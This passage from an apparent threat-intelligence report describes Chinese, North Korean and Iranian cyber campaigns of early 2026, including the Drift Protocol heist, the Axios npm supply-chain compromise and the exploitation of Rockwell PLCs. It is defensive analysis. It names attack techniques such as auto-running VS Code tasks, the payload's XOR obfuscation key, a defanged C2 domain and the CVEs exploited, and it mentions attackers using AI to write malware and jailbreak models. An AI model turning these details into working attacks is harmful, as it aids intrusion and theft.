The March 2026 White House cyber strategy (approximately 4 pages, one-seventh the length of Biden’s 2023 strategy) does not mention China, Iran, North Korea, or Russia by name—despite the FBI identifying China as “the most active and persistent cyber threat” to U.S. networks. The CFR assessed a growing gap between the stated U.S. cyber dominance posture and actual capacity, noting that “Chinese operators remain embedded in U.S. infrastructure.” The Trump administration’s decision to halt MSS sanctions plans to avoid disrupting the trade truce removes a significant deterrent during the highest-risk pre-summit intelligence collection period. NSM-22 (critical infrastructure security requirements) is under reconsideration with updates expected May 2026.

2.2.3 TTPs

Chinese APT TTPs reflect sophisticated multi-vector operations: ISP vendor supply chain exploitation for access to law enforcement systems; kernel-level BPF-based implants that operate below standard monitoring tools; DLL sideloading triads with custom PlugX payloads; Microsoft Entra ID OAuth redirect abuse; Living-off-the-Land techniques using native Windows tools; and exploitation of edge devices (Fortinet, Ivanti, Citrix) for initial access. Storm-1175’s 24-hour access-to-ransomware timeline represents a significant acceleration in Chinese-speaking threat actor operational tempo.

2.2.5 Assessment and Outlook

China’s cyber threat level is assessed as CRITICAL and represents the most persistent structural threat to U.S. national security in cyberspace. The DCS-3000 breach, if confirmed as Salt Typhoon, would represent the most consequential intelligence compromise since the OPM breach. The pre-summit espionage window creates maximum collection incentive coincident with minimum U.S. detection capability due to CISA degradation. BeiDou confirmation fundamentally alters the strategic calculus in the Gulf and establishes a template applicable to a Taiwan contingency. Near-term watch items include formal DCS-3000 attribution, Trump-Xi summit cyber deliverables, and exploitation of newly added CISA KEV entries.

2.3 North Korea

2.3.1 Strategic Overview

North Korean cyber operations continue at CRITICAL tempo with lifetime cryptocurrency theft now exceeding $6.7 billion. The Q1 2026 pace of $300M+ stolen across 18 attacks (Elliptic) suggests annualized theft approaching $1.2B if sustained. The Drift Protocol heist represents the most sophisticated DPRK social engineering operation ever documented, featuring in-person conference attendance and real capital investment. The Axios npm supply chain attack demonstrates continued evolution of software supply chain compromise methodology following the 3CX precedent. Approximately 100,000 DPRK IT workers across 40+ countries generate approximately $500M annually for the regime. The DNI 2026 Annual Threat Assessment confirms DPRK’s cyber program as “sophisticated and agile.”

2.3.2 Key Developments

• Drift Protocol $286M Heist (April 1, attributed April 5): UNC4736/Citrine Sleet/Golden Chollima conducted a six-month social engineering operation targeting Drift Protocol, Solana’s largest perpetual futures exchange. Operatives attended cryptocurrency conferences in person, deposited $1M+ in real capital, created a fake CarbonVote Token, and exploited Solana durable nonces to drain $286M in 12 minutes across 31 transactions. Attribution linked to Radiant Capital October 2024 attackers.

• Axios npm Supply Chain Attack (March 31): UNC1069/Sapphire Sleet/NICKEL GLADSTONE compromised the Axios npm package (100M+ weekly downloads) via hijacked maintainer account. Deployed SILKBELL dropper and WAVESHAPER.V2 cross-platform RAT. Maintainer postmortem (April 6) revealed two-week rapport-building operation with fake Slack workspace. 135 confirmed compromised devices. Transitive propagation through @wordpress/scripts and Datadog packages confirmed.

• Q1 2026 pace: $300M+ stolen across 18 attacks according to Elliptic.

• DOJ IT Worker Sentencing (March 20): Three defendants sentenced including an active-duty U.S. Army soldier at Fort Gordon who ran a laptop farm for DPRK IT workers for approximately three years.

• IBM X-Force/Flare Research (March 18): Approximately 100,000 DPRK IT workers across 40+ countries generating $500M/year with documented use of PiKVM, AstrillVPN, and AI-assisted interviews.

• Bybit $1.46B laundering essentially complete by the one-year mark.

• Contagious Interview/StegaBin campaigns continue with VS Code tasks.json auto-execution technique confirmed in Drift attack.

• Lazarus Medusa ransomware deployed against U.S. healthcare targets.

• OFAC March 12 sanctions: 6 individuals, 2 entities, 21 cryptocurrency addresses designated.

2.3.2a Detailed Campaign Analysis

Drift Protocol Attack — Operational Timeline

The Drift Protocol attack represents a paradigm shift in DPRK social engineering sophistication. Beginning in Fall 2025, UNC4736 operatives attended major cryptocurrency conferences worldwide posing as representatives of a quantitative trading firm. They built rapport with Drift Protocol contributors over Telegram, engaging in substantive conversations on trading strategies and vault integrations. Between December 2025 and January 2026, the fake trading group onboarded an Ecosystem Vault on Drift Protocol and deposited over $1 million in real capital—an unprecedented financial commitment to a social engineering operation. Between February and March 2026, operatives shared links to “projects, tools, and applications” serving as infection vectors. Around March 11, the attacker withdrew 10 ETH from Tornado Cash as operational funding. On March 12 at approximately 09:00 Korea Standard Time, they deployed the CarbonVote Token (CVT) on Solana—the timestamp serving as an attribution indicator. Over the following weeks, wash trades on Raydium DEX maintained CVT’s price near $1.00, causing Drift’s oracles to accept it as legitimate collateral. Between March 23 and 30, Solana “durable nonces” were used to induce Security Council multisig members to pre-sign seemingly routine transactions. On March 27, Drift migrated its Security Council to a 2-of-5 threshold and removed the timelock entirely, creating a zero-delay execution window. On April 1, the attack executed: CVT was listed as collateral, withdrawal limits were raised, 785 million CVT were deposited, and 31 withdrawals in 12 minutes drained $286M in JLP, USDC, SOL, wBTC, and wETH. Circle’s Cross-Chain Transfer Protocol was used to bridge $230M+ from Solana to Ethereum; Circle took six hours to freeze funds—well after most holdings had been converted.

Axios npm Supply Chain — Attack Mechanics

The Axios attack demonstrated pre-staged multi-target capability: both the 0.x and 1.x release branches were hit within 40 minutes, reflecting detailed advance planning. The attackers compromised maintainer account @jasonsaayman using a long-lived classic npm access token that bypassed GitHub Actions OIDC workflow protections. Eighteen hours prior, they published a clean decoy package (plain-crypto-js@4.2.0) to reduce scrutiny. The only modification to Axios itself was addition of plain-crypto-js as a dependency—the package was never imported in source code, relying purely on npm’s postinstall hook mechanism. The SILKBELL dropper used two-layer obfuscation (reversed Base64 + XOR cipher with key “OrDeR_7077” and constant 333) and dynamically loaded Node.js modules to evade static analysis. Anti-forensic cleanup deleted the dropper and malicious package.json, replacing them with clean stubs. WAVESHAPER.V2 deployed platform-specific persistence: macOS payloads masqueraded as Apple system caches, Windows payloads disguised themselves as Windows Terminal, and Linux variants used nohup persistence. The C2 beacon at sfrclak[.]com contacted every 60 seconds using an anachronistic Internet Explorer 8 user-agent string. Transitive dependency propagation was confirmed through @wordpress/scripts and Datadog yarn packages, meaning organizations that never directly installed Axios could still be compromised through nested dependencies.

IT Worker Operations — Scale and Sophistication

The IBM X-Force/Flare joint research report published in March 2026 provides the most comprehensive assessment of DPRK IT worker operations to date. Approximately 100,000 North Korean IT workers deployed across 40+ countries generate approximately $500 million annually for the regime, with individual workers earning over $300,000 per year from U.S. tech companies while retaining only approximately $200 per month. The ecosystem operates through a four-tier model: recruiters screen candidates and record interviews; facilitators function as hiring managers approving placements; IT workers execute contracts using full-stack web development skills; and collaborators provide Western identities recruited via LinkedIn and GitHub. Technical tools include OConnect/NetKey (North Korean VPN connecting to Pyongyang networks), IP Messenger for peer communications, and Google Translate for all work interactions. When discovered and terminated, workers escalate through a progression: demand for access reinstatement, threatened sale of sensitive data to competitors, claimed residual system access, and handoff to DPRK APT groups. Workers operating from China tunnel through U.S. exit nodes via Astrill VPN. The Nisos operational report (March 20) documented PiKVM-based laptop farm infrastructure with approximately 40 devices, real-time AI overlay behavior during video interviews, and Tailscale mesh VPN for farm connectivity.

Bybit $1.46B — Laundering Complete

The Bybit hack (February 21, 2025) laundering was confirmed essentially complete by the one-year mark. The overwhelming majority of the $1.46 billion stolen was successfully laundered through DeFi protocols (immediate conversion), mixing services, Chinese-language OTC traders, no-KYC exchanges, and fiat conversion pathways. At least $1 billion was laundered within the first six months via suspected Chinese OTC desks. The Bybit theft accounted for 69% of all crypto-service losses industry-wide in 2025. CSIS published analysis on March 24 calling for updated U.S. crypto regulation in response. The completion of the Bybit laundering confirms DPRK has successfully converted the $1.46B into usable regime revenue, consistent with Chainalysis’s documented 45-day laundering cycle observed across 2022–2025 major thefts.

DPRK Social Engineering Evolution

The Drift Protocol attack marks a qualitative leap in DPRK social engineering sophistication. For the first time publicly documented, DPRK operatives attended cryptocurrency conferences in person—not merely engaging targets online but physically meeting and building relationships with potential victims. The investment of $1M+ in real capital as a credibility-building measure demonstrates willingness to commit significant financial resources to individual operations, a departure from the high-volume, low-investment phishing campaigns that historically characterized DPRK operations. The use of Apple TestFlight for malware delivery represents adaptation to mobile ecosystems, while the VS Code tasks.json technique (adopted December 2025) exploits the implicit trust developers place in code repositories. The six-month operational timeline from initial conference contact to execution demonstrates patience previously associated with state intelligence services conducting human intelligence operations rather than cybercrime groups. This evolution suggests DPRK cyber operations are increasingly guided by intelligence tradecraft principles rather than purely technical exploitation.

Contagious Interview / Famous Chollima — Ongoing Campaigns

The Contagious Interview campaign continues operating multiple parallel techniques simultaneously. The March 2, 2026 “StegaBin” variant deployed 26 malicious npm packages using character-level steganography in Pastebin for C2 encoding. The Lazarus graphalgo campaign (active since May 2025) uses fake company “Veltrix Capital” and GitHub repositories containing malicious npm/PyPI dependencies. Secondary payloads target MetaMask extensions and crypto wallet data. BeaverTail, InvisibleFerret, and OtterCookie malware families remain active in the Contagious Interview pipeline. SentinelOne documented 230+ victims between January–March 2025. The group actively monitors CTI platforms (VirusTotal, Validin, Maltrail) for infrastructure exposure detection, demonstrating operational security awareness that complicates defender tracking efforts.

APT37/ScarCruft and Kimsuky — Status

APT37 (ScarCruft, Reaper, Ruby Sleet) launched the “Ruby Jumper” campaign documented February 27, 2026, deploying five previously undocumented tools targeting air-gapped systems via Zoho WorkDrive C2 and USB implants. No new APT37 disclosures emerged in the April 3–10 window. Kimsuky (Emerald Sleet, APT43) continues its quishing (QR-code phishing) campaign against U.S. think tanks, NGOs, and government entities as documented in FBI FLASH AC-000001-MW (January 8, 2026). The campaign uses embedded QR codes routing to Microsoft 365/Okta/VPN credential harvesting pages with session-token theft for MFA bypass. Kimsuky remains the primary DPRK espionage vector targeting policy and intelligence communities.

The Drift Protocol forensic postmortem published April 5 also revealed two distinct infection vectors. First, a contributor cloned a code repository shared by the fake trading group to deploy a frontend for their vault; the repository contained a malicious VS Code tasks.json file with a runOn: folderOpen auto-execution trigger—a Contagious Interview technique adopted by DPRK actors starting December 2025 that prompted Microsoft to add security controls in VS Code versions 1.109 and 1.110. Second, a contributor was persuaded to download a wallet product via Apple TestFlight (beta test application), likely delivering malware through the beta distribution channel. The combination of in-person social engineering, legitimate platform abuse, and code repository weaponization represents the most multi-vector DPRK social engineering operation publicly documented.

Circle CCTP Controversy

The use of Circle’s Cross-Chain Transfer Protocol to bridge $230M+ of stolen USDC from Solana to Ethereum, with Circle requiring six or more hours to freeze funds after notification, triggered significant industry criticism. By the time Circle acted, the attacker had already converted most holdings to ETH and routed portions through Hyperliquid and Binance. The incident highlights the tension between stablecoin issuers’ centralized control capabilities and their operational response times during active theft. Multiple DeFi protocols have called for revised incident response SLAs with stablecoin issuers, and the Drift incident may accelerate industry-wide adoption of Multi-Party Computation (MPC) wallets and automated freeze mechanisms.

Konni/Opal Sleet (TA406) — APAC Targeting

DPRK’s Konni group (Opal Sleet, TA406) was noted during this period for an ongoing campaign using AI-generated PowerShell malware targeting blockchain and cryptocurrency developers across Asia-Pacific (Japan, Australia, India). Delivery vectors include malicious Google Ads (search hijacking for developer tools) and Discord communities distributing fake software updates. The malware chain employs AI-written PowerShell backdoors (reportedly generated with ChatGPT or Claude-class tools) for reconnaissance, persistence, credential theft, screenshot capture, keylogging, and exfiltration. The campaign’s use of AI-generated malware represents an acceleration trend consistent with the broader DPRK adoption of agentic AI tools for malware iteration and LLM jailbreaking documented in the IBM X-Force and Flare research.

2.3.3 TTPs

DPRK TTPs have reached a new sophistication plateau with the Drift Protocol operation. The attack sequence—in-person conference attendance, real capital investment, multi-month rapport building, VS Code weaponization, Solana durable nonce exploitation—represents social engineering at a level previously associated only with state intelligence services conducting human intelligence operations. Supply chain attacks continue to evolve with the Axios compromise demonstrating pre-staged multi-branch targeting (both 0.x and 1.x branches hit within 40 minutes). SILKBELL’s anti-forensic self-deletion and WAVESHAPER.V2’s cross-platform persistence reflect mature operational security. IT worker operations now employ Faceswap AI, agentic AI for malware generation, and LLM jailbreaking.

2.4 Iran

2.4.1 Strategic Overview

Iran’s cyber posture entered a transformative phase during this period. The April 7 six-agency joint advisory confirmed what analysts had warned: Iranian-linked actors have achieved operational access to U.S. critical infrastructure control systems and are actively manipulating them. CSIS upgraded its assessment of Iran’s cyber doctrine from “episodic” to “sustained strategic,” reflecting a permanent shift in which cyberspace is treated as an extension of state power against critical infrastructure. The post-Hormuz ceasefire environment paradoxically elevates cyber risk: Handala explicitly declared the cyber war independent of military truces, and experts predict Iranian groups will pivot to high-profile U.S. targets during the kinetic lull. Iran’s internet blackout reached Day 41 (960+ hours)—the longest nationwide shutdown ever recorded—but external cells continue operating at elevated tempo via Starlink and Telegram coordination.

2.4.2 Key Developments

• SIX-AGENCY JOINT ADVISORY (April 7): FBI, CISA, NSA, DOE, EPA, and U.S. Cyber Command confirmed active Iranian exploitation of internet-facing Rockwell Automation Allen-Bradley PLCs across U.S. water/wastewater, energy, and municipal facilities. Operational disruption confirmed by EPA. Attackers use CVE-2021-22681 (Studio 5000 Logix Designer authentication bypass) and Living-off-the-Land in OT with Rockwell’s own legitimate tools. 5,219 internet-exposed Rockwell PLCs identified globally, 74.6% in the U.S. (Censys, April 9).

• Hormuz Deadline Aftermath: Deadline passed April 6 without deal. Trump extended to April 7. Pakistan brokered two-week ceasefire April 7–8. Iran re-closed Hormuz April 8 citing Israeli strikes in Lebanon (”Operation Eternal Darkness”). Only approximately 15 ships/day transiting versus 135 pre-crisis.

• Handala Ceasefire Declaration: Temporarily paused U.S. attacks but declared “The cyber war did not begin with the military conflict, and it will not end with any military ceasefire.” Continued operations against Israel.

• CSIS upgraded Iran’s posture from “episodic” to “sustained strategic cyber doctrine” (April 7). Cyber operations are now Iran’s primary retaliation vector as conventional military capabilities are degraded.

• Handala/Kash Patel Email Breach (March 27): Published 300+ emails from FBI Director’s personal account. $10M Rewards for Justice bounty announced.

• APT Iran 375TB Lockheed Martin Claim: Listed for sale at $598M+. Verification status disputed; doxxing of 28 Lockheed Martin engineers independently confirmed.

• IRGC 18 Tech Company Target List (March 31): Expanded to Apple, Microsoft, Google, Meta, Nvidia, and 13 others. No confirmed large-scale executions during the period.

• Undersea Cable Scissors Strategy + Bab al-Mandeb expansion threat (April 6). IRGC confirmed cables “will not be spared from attack.”

• Stryker full recovery confirmed Day 21 (April 1). 200,000+ devices wiped across 79 countries via Microsoft Intune abuse.

• Iran Internet Blackout Day 41 (960+ hours, longest nationwide shutdown ever recorded). Government signaled permanent “Absolute Digital Isolation” policy.

• Satellite jamming tower destroyed near Shiraz briefly restored satellite connectivity.

• MuddyWater active on U.S. bank, airport, defense supplier networks with Dindoor and Fakeset backdoors.

• CyberAv3ngers OT scanning of cameras, PLCs, and industrial equipment.

• Cotton Sandstorm Gulf operations resumed, including Qatari LNG facility targeting.

• Pioneer Kitten ransomware collaboration with financial incentives.

• Approximately 60 hacktivist groups active via Electronic Operations Room coordination.

2.4.2a Detailed Campaign Analysis

Six-Agency Joint Advisory — Technical Details

The April 7 joint advisory (AA26-097A) represents the most significant U.S. government ICS/OT threat disclosure of the reporting period. Six agencies—FBI, CISA, NSA, DOE, EPA, and U.S. Cyber Command—confirmed that Iranian-affiliated APT actors are actively exploiting internet-facing Rockwell Automation Allen-Bradley programmable logic controllers across U.S. water/wastewater, energy, and municipal facilities. The advisory confirmed “operational disruption and financial loss” at multiple unnamed sites, with manipulations of Human Machine Interface (HMI) and SCADA display data. The attack methodology exploits CVE-2021-22681, a Rockwell Studio 5000 Logix Designer authentication bypass that allows non-Rockwell applications to connect with Logix controllers by discovering a cryptographic key. Attackers employ Living-off-the-Land in OT environments, using Rockwell’s own legitimate Studio 5000 software to interact with project files and manipulate SCADA displays—mirroring the Stryker MDM abuse where no custom malware was deployed. Confirmed targeted device families include CompactLogix and Micro850. Attackers are also probing Modbus (port 502) and Siemens S7 (port 102), indicating multi-vendor OT reconnaissance. Censys research (April 9) identified 5,219 internet-exposed hosts globally responding to EtherNet/IP (port 44818), with the United States accounting for 74.6% (3,891 devices). Notably, 49.1% are on Verizon Business cellular networks, meaning they reach the internet via cellular modems for remote field connectivity. Many MicroLogix 1400 devices run end-of-sale firmware with no ongoing security support. Government recommendations include enabling MFA on all remote OT access, removing PLCs from public internet, setting physical mode switches to RUN position, and auditing logs for inbound traffic on TCP 44818, 2222, 102, 502, and 22.

Hormuz Timeline — April 5–10 Detail

The final pre-deadline period saw escalating brinkmanship. On April 5, Pakistan introduced a 45-day two-phased ceasefire framework which Iran rejected, instead proposing its own 10-point plan. Pre-war transit data showed 70–80 ships per day through Hormuz; by April 5 this had collapsed to 8 transits (4 cargo, 4 tankers) and April 6 saw only 10 transits. Iran rejected the April 6 deadline outright, insisting on a permanent end to hostilities, lifting of all sanctions, and structured safe-passage regime. On April 7, Trump posted “A whole civilization will die tonight” as an ultimatum, while the six-agency cyber advisory was simultaneously published. Hours before the midnight deadline, Pakistan PM Sharif announced a two-week ceasefire. However, Iran fired four waves of ballistic missiles at Israel, 17 missiles and 35 drones at the UAE, and struck targets in Kuwait and Qatar surrounding the ceasefire announcement. On April 8, Iran re-closed Hormuz citing Israeli strikes in Lebanon under “Operation Eternal Darkness,” imposing tolls exceeding $1 million per ship. By April 10, only approximately 15 ships per day transited versus the 135 pre-crisis baseline. The ceasefire’s structural fragility is evidenced by mutually exclusive victory narratives and immediate Israeli violations through continued airstrikes in Lebanon.

Hacktivist Ecosystem — 60+ Active Groups

The Electronic Operations Room established February 28 continues to coordinate approximately 60 pro-Iranian hacktivist groups via Telegram. Key groups include: Handala/Void Manticore (MOIS-attributed, confirmed wiper and psychological operations); CyberAv3ngers (IRGC Cyber-Electronic Command, OT/ICS scanning); Cotton Sandstorm/Emennet Pasargad (IRGC-linked, Gulf operations); Pioneer Kitten/Fox Kitten (ransomware affiliate partnerships); FAD Team/Fatimiyoun (SCADA/PLC claims); Cyber Islamic Resistance (RipperSec, Cyb3rDrag0nzz); Cyber Isnaad Front (newly identified telecom targeting); 313 Team (Iraq-based, Kuwait targeting); DieNet (Gulf airport and banking DDoS); Sylhet Gang-SG (Saudi ministry claims); Dark Storm Team (Israeli banking DDoS); Evil Markhors (Israeli banking); and APT Iran (data exfiltration and monetization). Pro-Russian groups actively supporting Iranian operations include NoName057(16), Cardinal, Russian Legion, Z-Pentest Alliance, and DDoSia Project. While most hacktivist claims remain unverified, the collective volume creates persistent pressure on defender resources across Israeli, Gulf, and Western targets.

Undersea Cable Threat — “Scissors Strategy”

Iran’s threat to undersea cable infrastructure escalated significantly during the period. On March 28, a senior IRGC commander confirmed that critical undersea cable infrastructure in the Hormuz corridor “will not be spared from attack.” On April 6, Iran extended threats to Bab al-Mandeb, the narrow strait between Yemen and the Horn of Africa, creating risk to a second global digital chokepoint. Approximately 17 submarine cable systems operate in or transit the Persian Gulf, with 12 having segments in waters where IRGC has declared active military operations. The Persian Gulf is approximately 35 meters deep at its shallowest—within IRGC midget submarine and combat diver range. Cables at risk include AAE-1 (the longest submarine cable system connecting Southeast Asia through Persian Gulf to Africa and Europe), FALCON (linking UAE, Oman, Qatar, Kuwait, Bahrain, India), Gulf Bridge International Cable System, Europe India Gateway, SEA-ME-WE 6, FLAG, Fibre in Gulf, TGN-Gulf, and Meta’s 2Africa Pearls extension. Meta was forced to suspend work on 2Africa Pearls with the cable-laying vessel Ile de Batz stranded off Saudi Arabia under force majeure. Google and Meta activated contingency rerouting plans, and India’s Department of Telecommunications directed operators to prepare contingency plans.

Stryker Corporation — Full Recovery Analysis

Stryker confirmed full operational recovery on April 1, Day 21 following the March 11 wiper attack. The Handala/Void Manticore attack weaponized Microsoft Intune to issue bulk factory reset commands to 200,000+ devices globally across 79 countries without deploying a single line of traditional malware, evading endpoint detection and response tools entirely. ProArch reported up to 95% of devices in some departments were erased before defenders could react. The attack confirmed the “Era of Identity Weaponization” shift identified by Unit 42, where Iranian groups move from compiled wiper malware to Living-off-the-Land abuse of management planes. Stryker’s investigation with Palo Alto Networks Unit 42 identified a concealment-focused malicious file used to hide attacker activity—not a self-propagating wiper in the traditional sense. The company’s Q1 2026 earnings report due April 30 will provide the first financial quantification of the attack’s cost. The Microsoft Intune attack vector remains relevant across the healthcare sector, where similar MDM environments are widespread and often configured with insufficient multi-admin approval controls.

MuddyWater/Seedworm — Active U.S. Network Intrusions

MuddyWater (Seedworm, Mango Sandstorm), attributed to Iran’s MOIS, maintains active access to multiple U.S. organizational networks as of this reporting period. Broadcom/Symantec confirmed activity on a U.S. bank, U.S. airport, Canadian nonprofit, and the Israeli arm of a U.S. defense/aerospace software supplier since February 2026. New backdoors deployed include Dindoor (JavaScript on Deno runtime, enabling evasion of security software that doesn’t monitor Deno processes) and Fakeset (Python-based, using legitimate Python interpreters in a LOTL approach). Both backdoors use digital certificates signed by “Amy Cherne” and “Donald Gay”—the latter previously associated with MuddyWater’s Stagecomp and Darkcomp malware. Data exfiltration routes through Wasabi and Backblaze cloud storage to blend with normal corporate traffic. The parallel Operation Olalampo campaign spans MENA, Turkey, and Africa with overlapping infrastructure and new malware families: GhostFetch, GhostBackDoor, HTTP_VIP, and the Rust-based CHAR backdoor. UK NCSC issued an alert confirming Iranian state actors “almost certainly currently maintain at least some capability to conduct cyber activity” despite infrastructure degradation.

CyberAv3ngers — ICS/OT Active Operations

CyberAv3ngers, attributed to the IRGC Cyber-Electronic Command (IRGC-CEC), is the primary actor behind the PLC exploitation described in the April 7 joint advisory. The group’s methodology in the current campaign mirrors its 2023–2024 attacks on Unitronics Vision/Samba PLCs during the Gaza conflict, now expanded to Rockwell Automation Allen-Bradley devices. The group is simultaneously conducting active scanning of internet-facing industrial cameras (Dahua, Hikvision) and OT devices for reconnaissance and battle-damage assessment, exploiting CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044. A Trellix analysis noted an operational pause between January 8–27 coinciding with the internet blackout, providing “compelling circumstantial evidence” of state coordination—the group’s activity resumed when external connectivity was partially restored via Starlink. Primary targets include water/wastewater facilities (Unitronics PLC-equipped), energy infrastructure, food and beverage processing, and healthcare facilities.

Cotton Sandstorm/Emennet Pasargad — Gulf Energy Targeting

Cotton Sandstorm (Emennet Pasargad, also known as Aria Sepehr Ayandehsazan), an IRGC-linked entity, resumed Gulf operations in March 2026 after reactivating old hacktivist personas. Security researchers confirmed targeted operations against Qatari LNG facilities including Ras Laffan (the world’s largest LNG production site) and Mesaieed (Qatar’s industrial and petrochemical city). TTPs include ASPX web shell deployment, wiper and fake-ransomware operations, LOTL post-exploitation, reconnaissance tunneling, and WezRat infostealer deployment. Qatar hosts Al Udeid Air Base, a major U.S. military hub, making Qatari LNG targeting simultaneously a threat to U.S. military logistics, global LNG supply, and a punitive signal to Qatar for hosting U.S. forces. The EU imposed sanctions on Emennet Pasargad in March 2026 for the 2024 Paris Olympics attacks including French database breaches, Swedish SMS disruption, and disinformation operations.

Pioneer Kitten/Fox Kitten — Ransomware Affiliate Model

Pioneer Kitten (Fox Kitten, Lemon Sandstorm), assessed as IRGC-linked, continues operating a ransomware collaboration model with affiliates including NoEscape, RansomHouse, and ALPHV/BlackCat. The model has evolved during the conflict period: state-sponsored actors now offer financial incentives to ransomware operators targeting U.S. and Israeli organizations, broadening the collaborative model beyond technical access brokering to include direct financial subsidization. The group exploits a persistent vulnerability inventory including CVE-2019-19781 and CVE-2023-3519 (Citrix NetScaler), CVE-2022-1388 (F5 BIG-IP), CVE-2024-21887 (Ivanti VPN), CVE-2024-3400 (Palo Alto PAN-OS), and CVE-2024-24919 (Check Point Security Gateway). Cloud infrastructure abuse—using compromised cloud resources for follow-on operations against U.S. academic and defense sector entities—represents an evolution in the group’s operational model.

2.4.3 TTPs

The dominant TTP evolution during this period is Living-off-the-Land in OT environments. The six-agency advisory confirmed attackers are using Rockwell’s own Studio 5000 Logix Designer software to interact with PLC project files and manipulate SCADA displays—mirroring the Stryker attack’s weaponization of Microsoft Intune. This LOTL-in-OT approach uses no custom malware, leveraging vendor tools to blend into legitimate workflows. Additional Iranian TTPs include: AitM phishing against Microsoft login portals for Intune admin credential theft; Telegram C2 for hacktivist coordination and malware delivery; multi-stage malware chains with anti-forensic cleanup; exploitation of internet-connected cameras for battle damage assessment; and financially incentivized ransomware affiliate partnerships.

2.4.5 Assessment and Outlook

Iran’s cyber threat is assessed as CRITICAL and structurally escalating regardless of ceasefire status. The six-agency advisory confirming active PLC exploitation at U.S. facilities represents the most significant ICS compromise disclosure since the CyberAv3ngers’ 2023 Unitronics campaign. The ceasefire paradoxically concentrates threat activity in the cyber domain as kinetic options diminish. Handala’s explicit declaration that cyber operations will continue independently of military truces should be treated as a strategic commitment, not rhetoric. The ceasefire expiration window (approximately April 21–22) represents the highest near-term escalation trigger. Should negotiations in Islamabad fail, expect immediate resumption of wiper operations against U.S. organizations at Stryker scale or above. The undersea cable threat remains credible conditional—likely to be executed if Iran assesses it is losing leverage during negotiations.

PART 3: CROSS-DOMAIN ANALYSIS AND GEOPOLITICAL CONTEXT

3.1 Post-Hormuz Deadline Assessment

The April 6–10 sequence represents the most volatile 96-hour window of the conflict. The Trump April 6 deadline expired without an agreement. A second deadline on April 7 (8 PM ET) produced a Pakistan-brokered ceasefire announced hours before U.S. bombers were reportedly airborne. Iran fired four waves of ballistic missiles at Israel, 17 missiles and 35 drones at the UAE, and struck targets in Kuwait and Qatar in the hours surrounding the ceasefire announcement. Iran then re-closed Hormuz on April 8, citing Israeli strikes in Lebanon, and imposed tolls exceeding $1M per ship. By April 10, only approximately 15 ships per day were transiting versus the pre-crisis average of 135. The ceasefire’s structural fragility is evidenced by mutually exclusive victory narratives: the U.S. claims Iran capitulated after the elimination of Supreme Leader Khamenei; Iran claims the U.S. accepted its 10-point plan. Islamabad negotiations beginning April 10–11 will determine which interpretation survives.

3.2 Cross-Nation Convergence Patterns

Russia-Iran

The Russia-Iran convergence axis has escalated from hacktivist proxy support to confirmed military technology transfer, real-time intelligence sharing, and coordinated cyber operations. Russia is providing Iran with upgraded Geran-2 drones (jet-engine variants with AI computing and Starlink-capable communications), satellite imagery (24 surveys of 46 objects across 11 Middle Eastern countries in a 10-day period), and real-time U.S. warship positioning data. Ukrainian intelligence documented Z-Pentest Alliance, NoName057(16), and DDoSia Project coordinating with Iranian Handala on Israeli energy infrastructure attacks. The January 2025 Comprehensive Strategic Partnership Treaty (Article 4: mutual intelligence/security service cooperation) provides the legal framework.

Russia-DPRK

The TASS-KCNA formal information warfare agreement (March 28) operationalizes coordinated anti-Western messaging. The Russia-DPRK Strategic Partnership continues with DPRK troops in Russia and military technology exchange. No new cyber-specific collaboration disclosures during this period, though infrastructure sharing between Gamaredon and Lazarus was previously documented.

China-Iran

BeiDou-3 integration was publicly confirmed at the state level by Chinese Embassy counsellor Zhang Heqing. China simultaneously enabled Iran’s military effectiveness (BeiDou), protected Iran diplomatically (UN Security Council veto, April 7), and positioned itself as ceasefire co-mediator. Additional confirmed transfers include Yaogan/Jilin-1 ISR satellite coverage, SMIC chipmaking equipment, and CM-302 anti-ship missile technology. The Atlantic Council’s “Axis of Evasion” framework documents the three-way supply chain cooperation.

China-DPRK

China continues to provide infrastructure support including new Yalu River Bridge connectivity. DPRK expressed support for China’s Taiwan position. No new cyber-specific China-DPRK cooperation disclosed during this period.

3.3 Geopolitical Triggers and Escalation Calendar

3.2a Axis of Evasion Architecture

The Atlantic Council’s “Axis of Evasion” framework documents a three-way supply chain cooperation network between Russia, China, and Iran that extends beyond bilateral relationships into a self-reinforcing ecosystem. Iran transferred 600 disassembled Shahed-16 drones and components for 1,300 additional drones to Russia for its Ukraine campaign; by 2025, Russia assembled approximately 90% of Shaheds domestically. Russia then reversed the flow, shipping Russian-modified Shaheds (Garpiya-3) back to Iran with improvements developed through Ukraine operational experience, and with Chinese specialist support. Iranian drones and missiles now incorporate Chinese BeiDou satellite navigation systems (access granted in 2021); since the war began, Iran uses BeiDou for decoy signals to confuse threat analysis and conceal military movements. U.S. Treasury sanctioned Chinese front companies supplying gyro navigation devices for Iranian UAVs in February 2025, with a second network designated in November 2025. Iranian shadow fleet vessels from China carry precursors for rocket fuel. The Russia-China-Iran triangular supply chain creates reinforcing dependencies that make unilateral disruption increasingly difficult.

3.3a Ceasefire Expiration Risk Assessment

The ceasefire expiration window (approximately April 21–22) represents the highest-probability near-term trigger for simultaneous kinetic and cyber escalation. The ceasefire was already under immediate strain within 24 hours of announcement: Iran re-closed Hormuz citing Israeli violations, Israel continued airstrikes in Lebanon, and Iran’s parliamentary speaker declared “time is running out.” The key tripwire is Iran’s insistence that Lebanon be included in ceasefire protections—a condition explicitly rejected by the United States and Israel. If negotiations in Islamabad fail to produce a framework agreement by the ceasefire’s expiration, the expected cyber response includes: immediate Handala wiper campaigns against U.S. healthcare and defense organizations at or above Stryker scale; CyberAv3ngers escalation from PLC manipulation to disruptive operations at water and energy facilities; DDoS surge across 60+ hacktivist groups targeting Israeli, Gulf, and Western infrastructure; potential undersea cable interdiction if Iran assesses it has lost diplomatic leverage; and coordinated Russia-Iran hacktivist operations against energy and logistics infrastructure. The convergence of ceasefire collapse with CISA’s degraded capacity creates an asymmetric vulnerability window.

3.4a CISA Structural Analysis

